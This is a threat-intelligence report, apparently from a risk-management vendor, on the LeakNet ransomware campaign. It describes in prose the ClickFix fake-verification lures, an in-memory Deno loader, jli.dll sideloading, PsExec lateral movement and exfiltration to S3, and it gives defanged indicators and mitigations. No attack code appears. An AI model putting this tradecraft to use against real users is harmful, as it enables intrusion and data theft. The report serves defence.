Executive Summary

The emergence of the LeakNet ransomware campaign marks a significant escalation in the sophistication of ransomware operations targeting enterprise environments. This campaign leverages the ClickFix social engineering technique to gain initial access via compromised legitimate websites, coercing users into executing malicious scripts under the guise of security verifications. The attackers then deploy a custom in-memory loader built on the Deno JavaScript/TypeScript runtime, a legitimate and signed binary, to execute payloads directly in memory and evade traditional endpoint detection mechanisms. The attack chain is characterized by its abuse of trusted software, advanced in-memory execution, and stealthy post-exploitation tactics, including credential harvesting, lateral movement, and data exfiltration to cloud storage. This report provides a comprehensive technical analysis of the campaign, observed tactics, techniques, and procedures (TTPs), exploitation in the wild, victimology, and actionable mitigation strategies.

Threat Actor Profile

The LeakNet ransomware group is an emerging threat actor with a rapidly evolving toolkit and a demonstrated ability to integrate novel techniques into its operations. While direct attribution to a known advanced persistent threat (APT) group remains unconfirmed, the TTPs observed in this campaign overlap with those of established ransomware collectives such as Termite and Interlock. The group exhibits a high degree of operational security, leveraging legitimate software and cloud infrastructure to obfuscate their activities and complicate attribution. Public reporting from sources such as ReliaQuest, BleepingComputer, and News4Hackers indicates that LeakNet is opportunistic, targeting a broad range of corporate networks globally, with a particular focus on organizations where user interaction with web-based resources is frequent and security awareness may be lacking.

Technical Analysis of Malware/TTPs

The LeakNet campaign employs a multi-stage attack chain designed for stealth, persistence, and maximum impact.

Initial access is achieved through the ClickFix technique, wherein users visiting compromised legitimate websites are presented with fake security prompts, such as bogus Cloudflare Turnstile or CAPTCHA verifications. These prompts instruct users to execute a command—often via msiexec—that downloads and runs a signed script. The scripts, typically named Romeo*.ps1 (PowerShell) or Juliet*.vbs (VBScript), are crafted to appear benign and evade endpoint security controls.

Upon execution, the loader abuses the Bring Your Own Runtime (BYOR) tactic by deploying the Deno runtime. Deno is a modern, secure JavaScript/TypeScript runtime that is rarely flagged by security products due to its legitimate use in development environments. The malicious payload, often base64-encoded, is executed directly in memory using Deno, leaving minimal forensic artifacts and bypassing disk-based detection.

The in-memory loader fingerprints the host by collecting system information such as username, hostname, available memory, and OS version. It generates a unique victim identifier and establishes a persistent polling loop to a command-and-control (C2) server. The loader retrieves second-stage payloads, which are also executed in memory, further reducing the attack’s footprint.

Post-exploitation activities include DLL sideloading (notably via malicious jli.dll in C:\ProgramData\USOShared), credential discovery using tools like klist for Kerberos ticket enumeration, lateral movement through PsExec, and data exfiltration to Amazon S3 buckets. The campaign’s C2 infrastructure leverages both custom domains (e.g., okobojirent[.]com, mshealthmetrics[.]com) and cloud storage, complicating detection and takedown efforts.

Exploitation in the Wild

The LeakNet campaign has been observed in the wild since March 2026, with incidents reported across multiple sectors and geographies. The attack vector is primarily web-based, exploiting compromised legitimate websites to deliver the initial payload via ClickFix lures. There is no evidence of exploitation of specific software vulnerabilities or CVEs; instead, the campaign relies on user interaction and abuse of legitimate binaries. The use of newly registered domains and cloud infrastructure for C2 and exfiltration has been documented by multiple threat intelligence sources, including ReliaQuest and BleepingComputer. The campaign’s reliance on social engineering and trusted software makes it particularly challenging to detect and mitigate using traditional security controls.

Victimology and Targeting

LeakNet targets a broad spectrum of corporate networks, with no specific industry verticals singled out in public reporting. The campaign is global in scope, with confirmed activity in regions including India and North America. Victims are typically organizations where employees are likely to interact with web-based resources and may be susceptible to social engineering tactics. The attack chain’s dependence on user execution of scripts underscores the importance of security awareness and robust endpoint controls. There is no evidence to suggest targeting of specific software products or versions; rather, any Windows environment where users can be tricked into executing arbitrary scripts is at risk. The campaign’s use of Deno and Java for in-memory execution and DLL sideloading, respectively, further broadens the potential victim pool.

Mitigation and Countermeasures

Organizations should implement a multi-layered defense strategy to mitigate the risks posed by the LeakNet campaign. Monitoring for Deno runtime execution on endpoints where it is not expected is critical, as is alerting on the execution of PowerShell or VBScript files with suspicious names such as Romeo*.ps1 and Juliet*.vbs. Network monitoring should be configured to detect unexpected outbound connections to Amazon S3 and other cloud storage providers, as well as to known malicious domains and IP addresses associated with the campaign’s C2 infrastructure.

Endpoint detection and response (EDR) solutions should be tuned to identify DLL sideloading in non-standard directories, particularly involving jli.dll in C:\ProgramData\USOShared. Usage of PsExec for lateral movement should be restricted to authorized administrators and closely audited. Security awareness training should emphasize the dangers of executing unsolicited scripts or commands, even when presented as legitimate security checks.

Additional countermeasures include restricting the use of newly registered domains, implementing application allowlisting to prevent unauthorized execution of scripting engines and runtimes, and enforcing the principle of least privilege on user accounts. Regular review of cloud storage access logs and anomaly detection for data exfiltration events are also recommended.

References

ReliaQuest: Casting a Wider Net: ClickFix, Deno, and LeakNet’s Scaling Threat – https://reliaquest.com/blog/threat-spotlight-casting-a-wider-net-clickfix-deno-and-leaknets-scaling-threat/

BleepingComputer: LeakNet ransomware uses ClickFix, Deno runtime in stealthy attacks – https://www.bleepingcomputer.com/news/security/leaknet-ransomware-uses-clickfix-and-deno-runtime-for-stealthy-attacks/

News4Hackers: LeakNet Ransomware Utilizes ClickFix and Deno Runtime for Stealthy Attacks – https://www.news4hackers.com/leaknet-ransomware-utilizes-clickfix-and-deno-runtime-for-stealthy-attacks/

Reddit: LeakNet Ransomware Adopts ClickFix via Hacked Sites, Deploys Deno Loader – https://www.reddit.com/r/pwnhub/comments/1rwkgvp/leaknet_ransomware_adopts_clickfix_via_hacked/

MITRE ATT&CK: Command and Scripting Interpreter – https://attack.mitre.org/techniques/T1059/

MITRE ATT&CK: DLL Sideloading – https://attack.mitre.org/techniques/T1574/001/

Amazon S3 Exfiltration TTP – https://attack.mitre.org/techniques/T1567/002/

About Rescana

Rescana is a leader in third-party risk management (TPRM), providing organizations with a comprehensive platform to continuously monitor, assess, and mitigate cyber risks across their extended supply chain. Our advanced analytics and threat intelligence capabilities empower security teams to proactively identify emerging threats and respond with agility. For more information or to discuss how Rescana can support your organization’s cybersecurity posture, we are happy to answer questions at ops@rescana.com.